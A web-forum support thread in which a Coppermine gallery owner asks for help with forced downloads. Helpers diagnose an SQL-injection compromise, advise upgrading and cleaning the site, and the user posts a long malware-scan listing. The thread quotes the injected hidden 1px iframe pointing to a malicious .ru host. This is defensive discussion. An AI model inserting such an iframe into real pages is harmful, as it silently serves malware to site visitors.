Print

[jimi007]

Hello
I am happy to successfully installing this great free gallery but one error that coming when ever i browse my gallery its automatically downloading a file name randomly and from top.nash-kovcheg.ru and forcing to download file plz help me how to remove this error and stop this file to automatically load or download thnkx

my gallery link is

Code: [Select]

http://slinkycity.000page.com/coppermine/index.php
thnkx in advance

jimi[/b]

[onthepike]

Yes, because you are currently running CPG 1.4.19, you were hacked via SQL injection and now are the proud owner of an embedded iframe:

Code: [Select]

1074.<!--Coppermine Photo Gallery 1.4.19 (stable)-->
1096.<iframe width="1px" height="1px" scrolling="no" frameborder="0" src="http://top.nash-kovcheg.ru/in/2585" ></iframe>  
Update to the latest version.

[jimi007]

thnkx  :)for very fast reply how i delete this iframe and from which file i delete this code plz help and if i update to new version that this error is solved automatically ? or something require to edit ?
thnkx


jimi

[jimi007]

also plz give me link of latest version of coppermine in 1.4.x series bcz i do not want to install 1.5.x version now

thnkx

[onthepike]

3.1.3 Upgrading from cpg1.4.0 or better to version cpg1.4.25

• First, make a backup (dump) of your database.
• Backup your include/config.inc.php file, your anycontent.php file and your "albums" directory.
• Unpack the archive
• Except for the "albums" directory, upload all of the new files and directories making sure not to overwrite the include/config.inc.php file, your anycontent.php file or the albums directory.
• Run the file "update.php" in the coppermine directory once in your browser (e.g. http://yourdomain.tld/coppermine/update.php). This will update your coppermine install by making all necessary changes in the database.
• If you have made a custom theme, apply the changes that were introduced in the themes structure to your custom-made theme - refer to the theme-upgrade guide.

Please note: as there have been changes both in the coppermine files and the database from cpg1.4.0 or better to cpg1.4.25, users of older versions than cpg1.4.25 will have to apply all steps mentioned above: both the files have to be replaced and the update.php script has to be run once.

3.2 Why upgrade?

There is a good reason for every new maintenance release: they are usually being packaged when a new bug or vulnerability is being discovered that is relevant in terms of security. As suggested above, there are several minor bugfixes that go into each new release as well, not only the one major bug or vulnerability that lead to the maintenance release. Therefor, it will not be enough to just fix the single vulnerability that has been the initial reason for a new package to be released. Instead, always upgrade to the most recent stable release as soon as it has been announced.

• cpg1.4.20 Fixed vulnerability that allows (if unpatched) the uploading and execution of remote code (milw0rm exploit 7909)
• cpg1.4.21 Fixed serious vulnerability that allows (if unpatched) the attacker to gain admin privileges (milw0rm exploits 8114 and 8115)
• cpg1.4.22 Fixed XSS vulnerability in showdoc.php
• cpg1.4.23 Fixed serious vulnerability (milw0rm exploits 8713)
• cpg1.4.24 Updated previous security fix to avoid causing an infinite loop in PHP 4.3
• cpg1.4.25 Fix uploading problem caused by security fix
 
Download the latest version here.

[jimi007]

thnkx again for helping 

[jimi007]

upgrade to 1.4.25  completed but one thing that version check page shown anycontent.php   1.4.19

will i replace the anycontent.php with new one or not or what to do with both old files 1)anycontent.php 2)config.inc.php

thnkx

[jimi007]

upgrade is completed but error remains same that i tell above  its automatically downloading a file name randomly and from top.nash-kovcheg.ru and forcing to download file plz help me how to remove this error and stop this file to automatically load or download

thnkx

[onthepike]

Unfortunately, the easy part is over and you are now going to have to begin the process of sanitizing your web space. All details can be found here: Yikes! I've Been hacked! Now What?

The easiest solution requires you to have a complete backup of your /albums directory. If you do, and it matches your database backup, you can restore to a time before you were infected. Purge your entire albums directory from your web space and upload the last known good. If one exists. But you can't stop there. You need to follow all the steps outlined above.

If you do not, however, have a complete working and clean backup, you must manually sanitize your albums directory by analyzing each file to be sure it's a legitimate image file, deleting the other injected files one by one. The length of time it will take for you to restore your web space depends mostly on how many files you have in your /gallery/albums directory.

Take your time -- do it right. And for the time being, place your gallery into Maintenance Mode so as not to infect innocent passers-by.

We will be here if you have other questions. Good luck.

[jimi007]

i match the every file but not found any iframe plz tell from where u found this

Code: [Select]

1074.<!--Coppermine Photo Gallery 1.4.19 (stable)-->
1096.<iframe width="1px" height="1px" scrolling="no" frameborder="0" src="http://top.nash-kovcheg.ru/in/2585" ></iframe> 
thnkx

[jimi007]

also i use cure script and its display

Code: [Select]

not infected: ./bridgemgr.php
not infected: ./ratepic.php
not infected: ./phpinfo.php
not infected: ./image_processor.php
not infected: ./admin.php
not infected: ./viewlog.php
not infected: ./addpic.php
not infected: ./search.php
not infected: ./keyword_select.php
not infected: ./thumbnails.php
not infected: ./report_file.php
not infected: ./plugins/onlinestats/lang/english.php
not infected: ./plugins/onlinestats/lang/spanish.php
not infected: ./plugins/onlinestats/lang/lithuanian.php
not infected: ./plugins/onlinestats/lang/french.php
not infected: ./plugins/onlinestats/lang/dutch.php
not infected: ./plugins/onlinestats/lang/italian.php
not infected: ./plugins/onlinestats/lang/german.php
not infected: ./plugins/onlinestats/include/init.inc.php
not infected: ./plugins/onlinestats/configuration.php
not infected: ./plugins/onlinestats/codebase.php
not infected: ./plugins/stats_hits/ip_watch.php
not infected: ./plugins/stats_hits/lang/english.php
not infected: ./plugins/stats_hits/include/init.inc.php
not infected: ./plugins/stats_hits/stats.php
not infected: ./plugins/stats_hits/configuration.php
not infected: ./plugins/stats_hits/codebase.php
not infected: ./plugins/online_today/configuration.php
not infected: ./plugins/online_today/codebase.php
not infected: ./plugins/stats/lang/english.php
not infected: ./plugins/stats/lang/spanish.php
not infected: ./plugins/stats/lang/french.php
not infected: ./plugins/stats/lang/dutch.php
not infected: ./plugins/stats/lang/german.php
not infected: ./plugins/stats/include/init.inc.php
not infected: ./plugins/stats/stats.php
not infected: ./plugins/stats/configuration.php
not infected: ./plugins/stats/codebase.php
not infected: ./plugins/imageflow/plugin_config.php
not infected: ./plugins/imageflow/js/reflect.php
not infected: ./plugins/imageflow/lang/english.php
not infected: ./plugins/imageflow/lang/french.php
not infected: ./plugins/imageflow/lang/dutch.php
not infected: ./plugins/imageflow/lang/italian.php
not infected: ./plugins/imageflow/lang/german.php
not infected: ./plugins/imageflow/include/load_imageflowset.php
not infected: ./plugins/imageflow/include/init.inc.php
not infected: ./plugins/imageflow/configuration.php
not infected: ./plugins/imageflow/codebase.php
not infected: ./plugins/newusers/lang/english.php
not infected: ./plugins/newusers/lang/spanish.php
not infected: ./plugins/newusers/lang/french.php
not infected: ./plugins/newusers/lang/dutch.php
not infected: ./plugins/newusers/lang/italian.php
not infected: ./plugins/newusers/lang/german.php
not infected: ./plugins/newusers/include/init.inc.php
not infected: ./plugins/newusers/configuration.php
not infected: ./plugins/newusers/codebase.php
not infected: ./plugins/backup/start.php
not infected: ./plugins/backup/backup.php
not infected: ./plugins/backup/dump.php
not infected: ./plugins/backup/backup/start.php
not infected: ./plugins/backup/backup/backup.php
not infected: ./plugins/backup/backup/dump.php
not infected: ./plugins/backup/backup/lang/english.php
not infected: ./plugins/backup/backup/lang/french.php
not infected: ./plugins/backup/backup/lang/italian.php
not infected: ./plugins/backup/backup/lang/german.php
not infected: ./plugins/backup/backup/include/config.inc.php
not infected: ./plugins/backup/backup/include/init.inc.php
not infected: ./plugins/backup/backup/include/functions.files.inc.php
not infected: ./plugins/backup/backup/include/functions.inc.php
not infected: ./plugins/backup/backup/delete.php
not infected: ./plugins/backup/backup/gest.php
not infected: ./plugins/backup/backup/dump_start.php
not infected: ./plugins/backup/backup/configuration.php
not infected: ./plugins/backup/backup/restore.php
not infected: ./plugins/backup/backup/restore_start.php
not infected: ./plugins/backup/backup/codebase.php
not infected: ./plugins/backup/backup/backup_css.php
not infected: ./plugins/backup/backup/download.php
not infected: ./plugins/backup/lang/english.php
not infected: ./plugins/backup/lang/french.php
not infected: ./plugins/backup/lang/italian.php
not infected: ./plugins/backup/lang/german.php
not infected: ./plugins/backup/include/config.inc.php
not infected: ./plugins/backup/include/init.inc.php
not infected: ./plugins/backup/include/functions.files.inc.php
not infected: ./plugins/backup/include/functions.inc.php
not infected: ./plugins/backup/delete.php
not infected: ./plugins/backup/gest.php
not infected: ./plugins/backup/dump_start.php
not infected: ./plugins/backup/configuration.php
not infected: ./plugins/backup/restore.php
not infected: ./plugins/backup/restore_start.php
not infected: ./plugins/backup/codebase.php
not infected: ./plugins/backup/backup_css.php
not infected: ./plugins/backup/download.php
not infected: ./plugins/contact_us/lang/english.php
not infected: ./plugins/contact_us/include/init.inc.php
not infected: ./plugins/contact_us/contact_us.php
not infected: ./plugins/contact_us/configuration.php
not infected: ./plugins/contact_us/randomimage.php
not infected: ./plugins/contact_us/codebase.php
not infected: ./plugins/jupload/jupload.php
not infected: ./plugins/jupload/user/config.inc.php
can't read file: ./plugins/jupload/user/index.html
not infected: ./plugins/jupload/lang/norwegian.php
not infected: ./plugins/jupload/lang/english.php
not infected: ./plugins/jupload/lang/spanish.php
not infected: ./plugins/jupload/lang/german_sie.php
not infected: ./plugins/jupload/lang/japanese.php
not infected: ./plugins/jupload/lang/french.php
can't read file: ./plugins/jupload/lang/index.html
not infected: ./plugins/jupload/lang/dutch.php
not infected: ./plugins/jupload/lang/esperanto.php
not infected: ./plugins/jupload/lang/italian.php
not infected: ./plugins/jupload/lang/german.php
not infected: ./plugins/jupload/lang/german_formal.php
not infected: ./plugins/jupload/include/jupload.inc.php
not infected: ./plugins/jupload/include/j_picmgmt.inc.php
not infected: ./plugins/jupload/include/gui.inc.php
can't read file: ./plugins/jupload/include/index.html
not infected: ./plugins/jupload/include/j_catmgr.inc.php
not infected: ./plugins/jupload/page/config_page.php
not infected: ./plugins/jupload/page/log_error.php
not infected: ./plugins/jupload/page/upload_picture.php
not infected: ./plugins/jupload/page/edit_uploaded_pics.php
not infected: ./plugins/jupload/page/upload_page.php
can't read file: ./plugins/jupload/index.html
not infected: ./plugins/jupload/configuration.php
not infected: ./plugins/jupload/codebase.php
not infected: ./plugins/avmaker/lang/english.php
not infected: ./plugins/avmaker/lang/italian.php
not infected: ./plugins/avmaker/include/class.cropinterface.php
not infected: ./plugins/avmaker/include/inc.cropinterface.php
not infected: ./plugins/avmaker/include/inc.cropjavascript.php
not infected: ./plugins/avmaker/include/class.cropcanvas.php
not infected: ./plugins/avmaker/include/inc.cropimage.php
not infected: ./plugins/avmaker/configuration.php
not infected: ./plugins/avmaker/avatar.php
not infected: ./plugins/avmaker/codebase.php
not infected: ./plugins/loginform/configuration.php
not infected: ./plugins/loginform/codebase.php
not infected: ./plugins/light_box/configuration.php
not infected: ./plugins/light_box/codebase.php
not infected: ./plugins/light_box/addhit.php
not infected: ./plugins/bbcode/configuration.php
not infected: ./plugins/bbcode/codebase.php
not infected: ./plugins/sample/configuration.php
not infected: ./plugins/sample/codebase.php
not infected: ./plugins/CopperRank/include/init.inc.php
not infected: ./plugins/CopperRank/config.php
not infected: ./plugins/CopperRank/configuration.php
not infected: ./plugins/CopperRank/codebase.php
not infected: ./plugins/CopperRank/langs/english.php
not infected: ./plugins/CopperRank/langs/dutch.php
not infected: ./plugins/CopperRank/langs/italian.php
not infected: ./plugins/CopperRank/langs/german.php
not infected: ./plugins/CopperRank/langs/german_formal.php
not infected: ./plugins/framework/helpers/table_helper.php
not infected: ./plugins/framework/helpers/html_helper.php
not infected: ./plugins/framework/helpers/form_helper.php
not infected: ./plugins/framework/helpers/cosebase_helper.php
not infected: ./plugins/framework/initialize.php
not infected: ./plugins/framework/loader.php
not infected: ./plugins/framework/libraries/View.php
can't read file: ./plugins/framework/libraries/Lang.php
not infected: ./plugins/framework/libraries/Control.php
not infected: ./plugins/framework/libraries/Paypal.php
not infected: ./plugins/framework/libraries/Database.php
not infected: ./plugins/framework/libraries/Table.php
not infected: ./plugins/framework/libraries/User.php
can't read file: ./plugins/framework/libraries/Config.php
not infected: ./plugins/enlargeit/enl_ecard.php
not infected: ./plugins/enlargeit/enl_rteit.php
not infected: ./plugins/enlargeit/enl_hst.php
not infected: ./plugins/enlargeit/enl_download2.php
not infected: ./plugins/enlargeit/plugin_config.php
not infected: ./plugins/enlargeit/enl_delete.php
not infected: ./plugins/enlargeit/enl_hist.php
not infected: ./plugins/enlargeit/lang/czech.php
not infected: ./plugins/enlargeit/lang/english.php
not infected: ./plugins/enlargeit/lang/spanish.php
not infected: ./plugins/enlargeit/lang/french.php
not infected: ./plugins/enlargeit/lang/dutch.php
not infected: ./plugins/enlargeit/lang/italian.php
not infected: ./plugins/enlargeit/lang/slovak.php
not infected: ./plugins/enlargeit/lang/german.php
not infected: ./plugins/enlargeit/enl_addcomment.php
not infected: ./plugins/enlargeit/include/init.inc.php
not infected: ./plugins/enlargeit/include/load_enlargeitset.php
not infected: ./plugins/enlargeit/enl_addfav.php
not infected: ./plugins/enlargeit/enl_info.php
not infected: ./plugins/enlargeit/enl_cnt.php
not infected: ./plugins/enlargeit/configuration.php
not infected: ./plugins/enlargeit/enl_download.php
not infected: ./plugins/enlargeit/codebase.php
not infected: ./plugins/enlargeit/enl_comment.php
not infected: ./plugins/enlargeit/enl_bbcode.php
not infected: ./plugins/enlargeit/enl_rtepic.php
not infected: ./install.php
not infected: ./logs/log_header.inc.php
not infected: ./logs/avmaker/configuration.php
not infected: ./logs/avmaker/avatar.php
not infected: ./logs/avmaker/codebase.php
not infected: ./logs/security.log.php
not infected: ./logs/global.log.php
not infected: ./anycontent.php
not infected: ./addfav.php
not infected: ./stat_details.php
not infected: ./picmgr.php
not infected: ./keyword_create_dict.php
not infected: ./albmgr.php
not infected: ./charsetmgr.php
not infected: ./versioncheck.php
not infected: ./getlang.php
not infected: ./displayreport.php
not infected: ./editOnePic.php
not infected: ./lang/latvian.php
not infected: ./lang/indonesian.php
not infected: ./lang/russian.php
not infected: ./lang/finnish.php
not infected: ./lang/greek.php
not infected: ./lang/albanian.php
not infected: ./lang/slovenian.php
not infected: ./lang/croatian.php
not infected: ./lang/serbian.php
not infected: ./lang/portuguese.php
not infected: ./lang/thai.php
not infected: ./lang/english_gb.php
not infected: ./lang/chinese_gb.php
not infected: ./lang/norwegian.php
not infected: ./lang/romanian.php
not infected: ./lang/arabic.php
not infected: ./lang/brazilian_portuguese.php
not infected: ./lang/hungarian.php
not infected: ./lang/danish.php
not infected: ./lang/czech.php
not infected: ./lang/turkish.php
not infected: ./lang/catalan.php
not infected: ./lang/english.php
not infected: ./lang/estonian.php
not infected: ./lang/spanish.php
not infected: ./lang/swedish.php
not infected: ./lang/persian.php
not infected: ./lang/german_sie.php
not infected: ./lang/japanese.php
not infected: ./lang/lithuanian.php
not infected: ./lang/french.php
not infected: ./lang/korean.php
not infected: ./lang/georgian.php
not infected: ./lang/serbian_cy.php
not infected: ./lang/basque.php
not infected: ./lang/hindi.php
not infected: ./lang/chinese_big5.php
not infected: ./lang/dutch.php
not infected: ./lang/galician.php
not infected: ./lang/ukrainian.php
not infected: ./lang/bulgarian.php
not infected: ./lang/vietnamese.php
not infected: ./lang/welsh.php
not infected: ./lang/hebrew.php
not infected: ./lang/italian.php
not infected: ./lang/slovak.php
not infected: ./lang/german.php
not infected: ./lang/polish.php
not infected: ./lang/macedonian.php
not infected: ./albums/userpics/10001/index.html
not infected: ./albums/userpics/10002/index.html
not infected: ./albums/userpics/index.php
not infected: ./albums/edit/index.html
not infected: ./albums/index.php
not infected: ./groupmgr.php
not infected: ./profile.php
not infected: ./zipdownload.php
not infected: ./displayimage.php
not infected: ./upload.php
not infected: ./include/select_lang.inc.php
not infected: ./include/slideshow.inc.php
not infected: ./include/media.functions.inc.php
not infected: ./include/crop.inc.php
not infected: ./include/sql_parse.php
not infected: ./include/archive.php
not infected: ./include/update.inc.php
not infected: ./include/smtp.inc.php
not infected: ./include/picmgmt.inc.php
not infected: ./include/plugin_api.inc.php
not infected: ./include/debugger.inc.php
not infected: ./include/config.inc.php
not infected: ./include/zip.lib.php
not infected: ./include/init.inc.php
not infected: ./include/exif_php.inc.php
not infected: ./include/themes.inc.php
not infected: ./include/functions.inc.php
not infected: ./include/mb.inc.php
not infected: ./include/mailer.inc.php
not infected: ./include/logger.inc.php
not infected: ./include/search.inc.php
not infected: ./include/index.html
not infected: ./include/keyword.inc.php
not infected: ./include/langfallback.inc.php
not infected: ./include/imageObjectGD.class.php
not infected: ./include/smilies.inc.php
not infected: ./include/imageObjectIM.class.php
not infected: ./include/iptc.inc.php
not infected: ./include/exif.php
not infected: ./include/makers/gps.php
not infected: ./include/makers/fujifilm.php
not infected: ./include/makers/canon.php
not infected: ./include/makers/sanyo.php
not infected: ./include/makers/olympus.php
not infected: ./include/makers/nikon.php
not infected: ./include/phpmailer.lang-en.php
not infected: ./minibrowser.php
not infected: ./relocate_server.php
not infected: ./modifyalb.php
not infected: ./delete.php
not infected: ./pluginmgr.php
not infected: ./upgrade-1.0-to-1.2.php
not infected: ./logout.php
not infected: ./exifmgr.php
not infected: ./db_input.php
not infected: ./xp_publish.php
not infected: ./update.php
not infected: ./catmgr.php
not infected: ./docs/README.html
not infected: ./docs/showdoc.php
not infected: ./docs/theme/edit_template.html
not infected: ./docs/theme/edit_style.html
not infected: ./docs/theme/index.html
not infected: ./docs/theme/validation.html
not infected: ./docs/theme/edit_theme.html
not infected: ./searchnew.php
not infected: ./config.php
not infected: ./showthumb.php
not infected: ./calendar.php
not infected: ./login.php
not infected: ./ecard.php
not infected: ./bridge/smf10.inc.php
not infected: ./bridge/phpbb2018.inc.php
not infected: ./bridge/smf20.inc.php
not infected: ./bridge/invisionboard20.inc.php
not infected: ./bridge/phpbb22.inc.php
not infected: ./bridge/phpbb.inc.php
not infected: ./bridge/vbulletin30.inc.php
not infected: ./bridge/mybb.inc.php
not infected: ./bridge/xoops.inc.php
not infected: ./bridge/xmb.inc.php
not infected: ./bridge/coppermine.inc.php
not infected: ./bridge/mambo.inc.php
not infected: ./bridge/udb_base.inc.php
not infected: ./bridge/punbb115.inc.php
not infected: ./bridge/phorum.inc.php
not infected: ./bridge/punbb12.inc.php
not infected: ./forgot_passwd.php
not infected: ./usermgr.php
not infected: ./faq.php
not infected: ./keywordmgr.php
not infected: ./index.php
not infected: ./editpics.php
not infected: ./util.php
not infected: ./picEditor.php
not infected: ./displayecard.php
not infected: ./themes/rainy_day/template.html
not infected: ./themes/rainy_day/theme.php
not infected: ./themes/hardwired/template.html
not infected: ./themes/hardwired/theme.php
not infected: ./themes/blue_dragon/ReadMe.html
not infected: ./themes/blue_dragon/template.html
not infected: ./themes/blue_dragon/theme.php
not infected: ./themes/igames/template.html
not infected: ./themes/igames/theme.php
not infected: ./themes/caliSkinV6/ReadMe.html
not infected: ./themes/caliSkinV6/template.html
not infected: ./themes/caliSkinV6/theme.php
not infected: ./themes/2bornot2b/template.html
not infected: ./themes/2bornot2b/theme.php
not infected: ./themes/mac_ox_x/template.html
not infected: ./themes/mac_ox_x/theme.php
not infected: ./themes/classic/template.html
not infected: ./themes/classic/theme.php
not infected: ./themes/anime/ReadMe.html
not infected: ./themes/anime/template.html
not infected: ./themes/anime/theme.php
not infected: ./themes/project_vii/template.html
not infected: ./themes/project_vii/theme.php
not infected: ./themes/graphix/ReadMe.html
not infected: ./themes/graphix/template.html
not infected: ./themes/graphix/theme.php
not infected: ./themes/eyeball/template.html
not infected: ./themes/eyeball/theme.php
not infected: ./themes/sample/template.html
not infected: ./themes/sample/theme.php
not infected: ./themes/water_drop/template.html
not infected: ./themes/water_drop/theme.php
not infected: ./themes/fruity/template.html
not infected: ./themes/fruity/theme.php
not infected: ./themes/black_widdow/ReadMe.html
not infected: ./themes/black_widdow/template.html
not infected: ./themes/black_widdow/theme.php
not infected: ./themes/extremegamers/ReadMe.html
not infected: ./themes/extremegamers/template.html
not infected: ./themes/extremegamers/theme.php
not infected: ./mode.php
not infected: ./register.php
not infected: ./banning.php
not infected: ./nettoie_cpg.php
not infected: ./db_ecard.php
not infected: ./reviewcom.php


the files that have can't read file message have 0 byte size

plz help i dont know where is the hidden script or iframe i manually check but not found any file plz help[/b]

[onthepike]

Are you sure you have enough plugins?

Anyway, I see the output, not the code. You might try searching your files and database for base64_decode and/or base64.

It doesn't seem as if you have followed the directions for cleaning your website to the fullest extent. And I'm not sure what "Cure Script" is; post a link to that if you will.

Also, inside Config, look for extra information in your Title and Description textarea boxes. Sometimes, there will be spaces where you believe the line has ended but continues far below what's visible.

[jimi007]

ok i check and tell u these and here is link of cure

Code: [Select]

http://forum.coppermine-gallery.net/index.php/topic,51671.msg251701.html#msg251701

[jimi007]

problem solved now thnkx

[Joachim Müller]

Then post what you actually did to solve your issue for the benefit of others with similar issues. And stop posting in bold. And do as suggested per board rules. Thanks.